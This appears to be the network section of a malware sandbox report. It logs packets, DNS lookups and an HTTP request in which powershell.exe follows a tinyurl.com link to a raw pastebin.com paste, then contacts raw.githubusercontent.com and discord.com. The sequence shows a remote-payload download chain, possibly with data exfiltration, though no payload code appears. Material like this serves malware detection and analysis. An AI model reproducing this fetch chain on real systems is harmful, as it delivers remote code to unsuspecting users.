Oct 15, 2024 15:53:26.138045073 CEST | 49702 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:26.138076067 CEST | 443 | 49702 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:26.138448000 CEST | 443 | 49702 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:26.149876118 CEST | 49702 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:26.195398092 CEST | 443 | 49702 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:26.292696953 CEST | 443 | 49702 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:26.292795897 CEST | 443 | 49702 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:26.292907000 CEST | 49702 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:26.321548939 CEST | 49702 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:26.356343031 CEST | 49703 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:26.361149073 CEST | 80 | 49703 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:26.361308098 CEST | 49703 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:26.361634016 CEST | 49703 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:26.366846085 CEST | 80 | 49703 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:26.966737986 CEST | 80 | 49703 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:26.967073917 CEST | 49703 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:26.967808008 CEST | 80 | 49703 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:26.967866898 CEST | 49703 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:26.969435930 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:26.969456911 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:26.969540119 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:26.969865084 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:26.969877958 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:26.971884012 CEST | 80 | 49703 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.588567972 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.588690996 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:27.592070103 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:27.592086077 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.592466116 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.593545914 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:27.635433912 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.720889091 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.720973015 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.721000910 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.721043110 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.721056938 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:27.721084118 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.721123934 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:27.721162081 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:27.721170902 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.729180098 CEST | 443 | 49704 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:27.729286909 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:27.744276047 CEST | 49704 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:51.246588945 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:51.246651888 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:51.246722937 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:51.247083902 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:51.247107983 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:51.865629911 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:51.865708113 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:51.868614912 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:51.868634939 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:51.868983984 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:51.876303911 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:51.896352053 CEST | 49712 | 80 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:51.901200056 CEST | 80 | 49712 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:51.901278019 CEST | 49712 | 80 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:51.904943943 CEST | 49712 | 80 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:51.909799099 CEST | 80 | 49712 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:51.923398972 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:51.923464060 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:51.923487902 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:52.186367035 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:52.186527967 CEST | 443 | 49711 | 162.159.137.232 | 192.168.2.10
Oct 15, 2024 15:53:52.186625004 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:52.203365088 CEST | 49711 | 443 | 192.168.2.10 | 162.159.137.232
Oct 15, 2024 15:53:52.548341036 CEST | 80 | 49712 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:52.550909996 CEST | 49713 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:52.550971031 CEST | 443 | 49713 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:52.551062107 CEST | 49713 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:52.553993940 CEST | 49713 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:52.554012060 CEST | 443 | 49713 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:52.597326994 CEST | 49712 | 80 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:53.159373999 CEST | 443 | 49713 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:53.159523964 CEST | 49713 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:53.161505938 CEST | 49713 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:53.161518097 CEST | 443 | 49713 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:53.161984921 CEST | 443 | 49713 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:53.169249058 CEST | 49713 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:53.211431026 CEST | 443 | 49713 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:53.338071108 CEST | 443 | 49713 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:53.338450909 CEST | 443 | 49713 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:53.338579893 CEST | 49713 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:53.347111940 CEST | 49713 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:53.374808073 CEST | 49714 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:53.379717112 CEST | 80 | 49714 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:53.383785963 CEST | 49714 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:53.384794950 CEST | 49714 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:53.389767885 CEST | 80 | 49714 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:53.986255884 CEST | 80 | 49714 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:53.987039089 CEST | 80 | 49714 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:53.987193108 CEST | 49714 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:53.988868952 CEST | 49714 | 80 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:53.989877939 CEST | 49715 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:53.989923000 CEST | 443 | 49715 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:53.993761063 CEST | 80 | 49714 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:53.993879080 CEST | 49715 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:53.995670080 CEST | 49715 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:53.995686054 CEST | 443 | 49715 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:54.621551037 CEST | 443 | 49715 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:54.621650934 CEST | 49715 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:54.623701096 CEST | 49715 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:54.623708010 CEST | 443 | 49715 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:54.623980045 CEST | 443 | 49715 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:54.625119925 CEST | 49715 | 443 | 192.168.2.10 | 185.199.111.133
Oct 15, 2024 15:53:54.667432070 CEST | 443 | 49715 | 185.199.111.133 | 192.168.2.10
Oct 15, 2024 15:53:54.752075911 CEST | 443 | 49715 | 185.199.111.133 | 192.168.2.10
                                                                              Oct 15, 2024 15:53:54.752177954 CEST44349715185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:53:54.752197981 CEST44349715185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:53:54.752242088 CEST49715443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:53:54.752247095 CEST44349715185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:53:54.752259970 CEST44349715185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:53:54.752291918 CEST49715443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:53:54.752871037 CEST44349715185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:53:54.752927065 CEST49715443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:53:54.752937078 CEST44349715185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:53:54.760462999 CEST44349715185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:53:54.760535002 CEST49715443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:53:54.782629013 CEST49715443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:53:57.245276928 CEST4970180192.168.2.10104.18.111.161
                                                                              Oct 15, 2024 15:53:59.721376896 CEST4971680192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:53:59.726304054 CEST8049716172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:53:59.726388931 CEST4971680192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:53:59.727513075 CEST4971680192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:53:59.732363939 CEST8049716172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:00.333002090 CEST8049716172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:00.335421085 CEST49717443192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:00.335453987 CEST44349717172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:00.335527897 CEST49717443192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:00.338821888 CEST49717443192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:00.338840008 CEST44349717172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:00.378577948 CEST4971680192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:00.955003023 CEST44349717172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:00.955081940 CEST49717443192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:00.960350990 CEST49717443192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:00.960367918 CEST44349717172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:00.960819960 CEST44349717172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:00.968883991 CEST49717443192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:01.011403084 CEST44349717172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:01.128278017 CEST44349717172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:01.128376961 CEST44349717172.67.19.24192.168.2.10
                                                                              Oct 15, 2024 15:54:01.128621101 CEST49717443192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:01.577135086 CEST49717443192.168.2.10172.67.19.24
                                                                              Oct 15, 2024 15:54:01.598418951 CEST4971880192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:01.603430986 CEST8049718185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:01.603518963 CEST4971880192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:01.603790045 CEST4971880192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:01.608647108 CEST8049718185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.209845066 CEST8049718185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.210453987 CEST4971880192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.210697889 CEST8049718185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.210767984 CEST4971880192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.211576939 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.211632967 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.211702108 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.211973906 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.211993933 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.215363979 CEST8049718185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.826292992 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.826378107 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.828262091 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.828274965 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.828610897 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.829869032 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.871404886 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.956928015 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.956990004 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957015991 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957043886 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957068920 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957076073 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.957103014 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.957118034 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.957149982 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:02.957158089 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.964972019 CEST44349719185.199.111.133192.168.2.10
                                                                              Oct 15, 2024 15:54:02.965028048 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:03.025378942 CEST49719443192.168.2.10185.199.111.133
                                                                              Oct 15, 2024 15:54:07.200309992 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.200362921 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.200447083 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.200887918 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.200900078 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.865339041 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.865430117 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.867170095 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.867177010 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.867577076 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.868675947 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.911412954 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:07.911545038 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:07.911556959 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:08.179148912 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:08.179272890 CEST44349720162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:08.179348946 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:08.185059071 CEST49720443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:13.267340899 CEST4971280192.168.2.10104.20.3.235
                                                                              Oct 15, 2024 15:54:15.471035004 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:15.471091032 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:15.471405029 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:15.471645117 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:15.471661091 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.071904898 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.072045088 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.080545902 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.080562115 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.080868959 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.083808899 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.131397009 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.131450891 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.131464005 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.372903109 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.373075962 CEST44349722162.159.137.232192.168.2.10
                                                                              Oct 15, 2024 15:54:16.373126984 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:16.379225969 CEST49722443192.168.2.10162.159.137.232
                                                                              Oct 15, 2024 15:54:21.413132906 CEST4971680192.168.2.10172.67.19.24
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:53:24.555679083 CEST | 62134 | 53 | 192.168.2.10 | 1.1.1.1
Oct 15, 2024 15:53:24.562563896 CEST | 53 | 62134 | 1.1.1.1 | 192.168.2.10
Oct 15, 2024 15:53:25.318777084 CEST | 50677 | 53 | 192.168.2.10 | 1.1.1.1
Oct 15, 2024 15:53:25.326030970 CEST | 53 | 50677 | 1.1.1.1 | 192.168.2.10
Oct 15, 2024 15:53:26.346915007 CEST | 51766 | 53 | 192.168.2.10 | 1.1.1.1
Oct 15, 2024 15:53:26.355330944 CEST | 53 | 51766 | 1.1.1.1 | 192.168.2.10
Oct 15, 2024 15:53:51.238801003 CEST | 58652 | 53 | 192.168.2.10 | 1.1.1.1
Oct 15, 2024 15:53:51.245807886 CEST | 53 | 58652 | 1.1.1.1 | 192.168.2.10
Oct 15, 2024 15:53:59.701875925 CEST | 57039 | 53 | 192.168.2.10 | 1.1.1.1
Oct 15, 2024 15:53:59.708549023 CEST | 53 | 57039 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 15:53:24.555679083 CEST | 192.168.2.10 | 1.1.1.1 | 0xe434 | Standard query (0) | tinyurl.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:25.318777084 CEST | 192.168.2.10 | 1.1.1.1 | 0x9838 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:26.346915007 CEST | 192.168.2.10 | 1.1.1.1 | 0xd9ed | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:51.238801003 CEST | 192.168.2.10 | 1.1.1.1 | 0xd705 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:59.701875925 CEST | 192.168.2.10 | 1.1.1.1 | 0x91d1 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 15:53:24.562563896 CEST | 1.1.1.1 | 192.168.2.10 | 0xe434 | No error (0) | tinyurl.com | - | 104.18.111.161 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:24.562563896 CEST | 1.1.1.1 | 192.168.2.10 | 0xe434 | No error (0) | tinyurl.com | - | 104.17.112.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:25.326030970 CEST | 1.1.1.1 | 192.168.2.10 | 0x9838 | No error (0) | pastebin.com | - | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:25.326030970 CEST | 1.1.1.1 | 192.168.2.10 | 0x9838 | No error (0) | pastebin.com | - | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:25.326030970 CEST | 1.1.1.1 | 192.168.2.10 | 0x9838 | No error (0) | pastebin.com | - | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:26.355330944 CEST | 1.1.1.1 | 192.168.2.10 | 0xd9ed | No error (0) | raw.githubusercontent.com | - | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:26.355330944 CEST | 1.1.1.1 | 192.168.2.10 | 0xd9ed | No error (0) | raw.githubusercontent.com | - | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:26.355330944 CEST | 1.1.1.1 | 192.168.2.10 | 0xd9ed | No error (0) | raw.githubusercontent.com | - | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:26.355330944 CEST | 1.1.1.1 | 192.168.2.10 | 0xd9ed | No error (0) | raw.githubusercontent.com | - | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:51.245807886 CEST | 1.1.1.1 | 192.168.2.10 | 0xd705 | No error (0) | discord.com | - | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:51.245807886 CEST | 1.1.1.1 | 192.168.2.10 | 0xd705 | No error (0) | discord.com | - | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:51.245807886 CEST | 1.1.1.1 | 192.168.2.10 | 0xd705 | No error (0) | discord.com | - | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:51.245807886 CEST | 1.1.1.1 | 192.168.2.10 | 0xd705 | No error (0) | discord.com | - | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:51.245807886 CEST | 1.1.1.1 | 192.168.2.10 | 0xd705 | No error (0) | discord.com | - | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:59.708549023 CEST | 1.1.1.1 | 192.168.2.10 | 0x91d1 | No error (0) | pastebin.com | - | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:59.708549023 CEST | 1.1.1.1 | 192.168.2.10 | 0x91d1 | No error (0) | pastebin.com | - | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:53:59.708549023 CEST | 1.1.1.1 | 192.168.2.10 | 0x91d1 | No error (0) | pastebin.com | - | 104.20.4.235 | A (IP address) | IN (0x0001) | false
• pastebin.com
• raw.githubusercontent.com
• discord.com
• tinyurl.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49701 | 104.18.111.161 | 80 | 7756 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:53:24.581403017 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 15:53:25.267205954 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:53:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Set-Cookie: __cf_bm=UPzyY0C7U9qNENE.77_kkH1Mp6PRUGsFgC5WAzylWOE-1729000405-1.0.1.1-blluZz9Mkqi.uzQnlfXYl.YUnHAFxH3Kfd9wSmXe_o3tgGgECGVR6jb1FBem9TajbPF3QwhE.KlvovNn2WB2pg; path=/; expires=Tue, 15-Oct-24 14:23:25 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d304b940c906900-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pastebin.com/
